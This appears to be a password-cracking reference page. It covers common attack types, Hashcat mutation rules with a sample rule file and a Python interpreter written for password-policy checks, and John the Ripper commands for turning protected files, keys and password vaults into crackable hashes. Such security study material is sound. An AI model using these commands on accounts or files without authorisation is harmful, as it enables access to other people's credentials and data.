Dictionary Attack
Using pre-generated word lists to guess passwords. Effective because many people use common words. Defend by using unique, complex passwords and two-factor authentication.
Brute Force
Trying every possible character combination. Very slow but thorough. Longer passwords (8+ characters) with mixed character types significantly increase cracking time.
Rainbow Table Attacks
Using pre-computed hash-to-password conversion tables. Faster than brute force but limited to passwords already in the table.
Default Credentials
Many, if not most, applications ship with default credentials after installation, and these are frequently left unchanged.
Default credentials can also be found in the product documentation, so they should be changed or disabled as part of deployment.
Pass the Hash
A weakness of the NTLM authentication protocol: a client can authenticate with just the password hash instead of the plaintext credentials. This bypasses the need for password cracking, since harvested hashes can be used directly for lateral movement.
Hashcat is the world’s fastest and most advanced password recovery tool. It’s compatible with CPUs, GPUs, and other hardware accelerators across different operating systems.
Hashcat can generate password variations using mutation rules, employing a specialized syntax for defining characters, words, and their possible modifications.
The comprehensive list of this syntax is available in Hashcat’s official documentation.
Here is an excerpt of that syntax.

Function   Description
:          Do nothing.
l          Lowercase all letters.
u          Uppercase all letters.
c          Capitalize the first letter and lowercase the others.
sXY        Replace all instances of X with Y.
$X         Append character X to the end.
Here is an example rule file. Each line is one rule, and the functions on a line are applied left to right.

custom.rule
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@

# Generating rule-based wordlist
hashcat --force passwords.txt -r custom.rule --stdout > mut_password.list
# List all the rules
ls /usr/share/hashcat/rules/
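To make the rule syntax concrete, here is a small interpreter for the six functions listed above. It is an added example written for this page, not code from the page or from the Hashcat project. It parses a rule file in the custom.rule format, applies the rules to a wordlist the way hashcat's --stdout mode does, and lets a defender check whether a proposed password is merely a rule mutation of a dictionary word (a useful password-policy test). The rule text is the page's custom.rule; the wordlist SAMPLE_WORDS and the function names are constructed for the example, and only the six functions from the table are implemented.

```python
"""Toy interpreter for the Hashcat rule functions : l u c sXY $X.

Added example, not from the original page or the Hashcat project. It shows
how a rule file expands a wordlist and how a defender can test whether a
proposed password is just a common mutation of a dictionary word.
"""

# Rule file copied from the page's custom.rule: one rule per line,
# functions on a line applied left to right.
CUSTOM_RULE_TEXT = """\
:
c
so0
c so0
sa@
c sa@
c sa@ so0
$!
$! c
$! so0
$! sa@
$! c so0
$! c sa@
$! so0 sa@
$! c so0 sa@
"""

# Constructed sample wordlist standing in for passwords.txt.
SAMPLE_WORDS = ["password", "welcome", "Summer"]


def parse_rules(text):
    """Return the rule lines of a rule file, skipping blank lines and # comments."""
    rules = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            rules.append(stripped)
    return rules


def apply_function(word, func):
    """Apply a single rule function to a word."""
    if func == ":":                                # do nothing
        return word
    if func == "l":                                # lowercase all letters
        return word.lower()
    if func == "u":                                # uppercase all letters
        return word.upper()
    if func == "c":                                # capitalize first, lowercase the rest
        return word[:1].upper() + word[1:].lower()
    if func.startswith("s") and len(func) == 3:    # sXY: replace every X with Y
        return word.replace(func[1], func[2])
    if func.startswith("$") and len(func) == 2:    # $X: append X to the end
        return word + func[1]
    raise ValueError(f"unsupported rule function: {func!r}")


def apply_rule(word, rule):
    """A rule line chains functions separated by whitespace, applied left to right."""
    for func in rule.split():
        word = apply_function(word, func)
    return word


def mutate_wordlist(words, rules):
    """Every candidate the rules produce from the wordlist, de-duplicated, in order."""
    candidates = {}
    for word in words:
        for rule in rules:
            candidates.setdefault(apply_rule(word, rule), None)
    return list(candidates)


def is_rule_mutation(candidate, words, rules):
    """True if the candidate would be generated from the wordlist by these rules."""
    return candidate in set(mutate_wordlist(words, rules))


if __name__ == "__main__":
    rules = parse_rules(CUSTOM_RULE_TEXT)
    generated = mutate_wordlist(SAMPLE_WORDS, rules)
    print(f"{len(rules)} rules x {len(SAMPLE_WORDS)} words -> {len(generated)} candidates")
    for proposed in ("P@ssw0rd!", "Summer2024", "correct horse battery"):
        hit = is_rule_mutation(proposed, SAMPLE_WORDS, rules)
        print(f"{proposed:>22}: {'rule mutation of a dictionary word' if hit else 'not a simple mutation'}")
```

Note that "P@ssw0rd!" satisfies every naive complexity rule (upper, lower, digit, symbol, nine characters) yet is produced from "password" by a single fifteen-line rule file; a policy check built on this idea should run a much larger wordlist and rule set than the sample here.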
Hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.
John the Ripper
John the Ripper is a fast password cracker primarily designed to detect weak Unix passwords. The “Jumbo” version expands this capability with support for hundreds of additional hash types and ciphers.
Cracking Files
John is also capable of cracking password-protected files. It has additional tools that process the files into hashes that John can work with.
# Turns file into hashes
pdf2john file.pdf > file.hash
# Crack using John
john file.hash
# OR
john --wordlist=/wordlists/passwords.txt file.hash
Here is a partial list of the conversion tools used for cracking files.

Tool                    Description
pdf2john                Converts PDF documents for John
ssh2john                Converts SSH private keys for John
mscash2john             Converts MS Cash hashes for John
keychain2john           Converts OS X keychain files for John
rar2john                Converts RAR archives for John
pfx2john                Converts PKCS#12 files for John
truecrypt_volume2john   Converts TrueCrypt volumes for John
keepass2john            Converts KeePass databases for John
vncpcap2john            Converts VNC PCAP files for John
putty2john              Converts PuTTY private keys for John
zip2john                Converts ZIP archives for John
hccap2john              Converts WPA/WPA2 handshake captures for John
office2john             Converts MS Office documents for John
wpa2john                Converts WPA/WPA2 handshakes for John
# List all the tools
locate *2john*
# 2John full list of tools
# https://medium.com/@1200km/2john-9bb0bd44ed64